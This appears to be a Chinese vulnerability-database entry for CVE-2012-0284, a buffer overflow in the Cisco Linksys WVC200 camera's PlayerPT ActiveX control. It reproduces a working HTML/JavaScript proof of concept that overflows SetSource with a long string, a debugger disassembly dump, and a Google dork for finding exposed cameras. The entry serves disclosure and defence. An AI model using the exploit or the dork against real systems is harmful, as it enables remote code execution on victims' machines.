Cisco Linksys PlayerPT ActiveX控件‘SetSource’方法缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120994 漏洞类型 缓冲区溢出
发布时间 2012-03-22 更新时间 2012-07-17
CVE编号 CVE-2012-0284 CNNVD-ID CNNVD-201207-391
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/18641
https://www.securityfocus.com/bid/54588
https://cxsecurity.com/issue/WLB-2012080024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201207-391
|漏洞详情
CiscoWVC200Wireless-GPTZInternet摄像机中的PlayerPT.ocx中的CiscoLinksysPlayerPTActiveX控件1.0.0.15版本内的SetSource方法中存在基于栈的缓冲区溢出漏洞。远程攻击者可利用该漏洞通过第一个参数中的长URL(又名sURL参数)执行任意代码。
|漏洞EXP
<!--
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX 
Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability

when viewing the device web interface it asks
to install an ActiveX control with the following settings:

ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True

try this google dork for WVC200:
linksys wireless-g ptz inurl:main.cgi

Vulnerability:
the SetSource() method is vulnerable to a buffer overflow
vulnerability. Quickly, ollydbg dump:

...
03238225   8B5424 20        mov edx,dword ptr ss:[esp+20]
03238229   894424 10        mov dword ptr ss:[esp+10],eax
0323822D   B9 32000000      mov ecx,32
03238232   33C0             xor eax,eax
03238234   8B72 F8          mov esi,dword ptr ds:[edx-8]
03238237   8DBC24 E8020000  lea edi,dword ptr ss:[esp+2E8]
0323823E   F3:AB            rep stos dword ptr es:[edi]
03238240   8B3D 0C062603    mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246   52               push edx
03238247   8D8C24 EC020000  lea ecx,dword ptr ss:[esp+2EC]
0323824E   68 48612603      push PlayerPT.03266148                   ; ASCII "%s"
03238253   51               push ecx
03238254   FFD7             call edi <---------------boom
...

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
    x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>
|受影响的产品
Cisco Wireless-G PTZ Internet Video Camera WVC200 0
|参考资料

来源:secunia.com
链接:http://secunia.com/secunia_research/2012-25/
来源:NSFOCUS
名称:20194
链接:http://www.nsfocus.net/vulndb/20194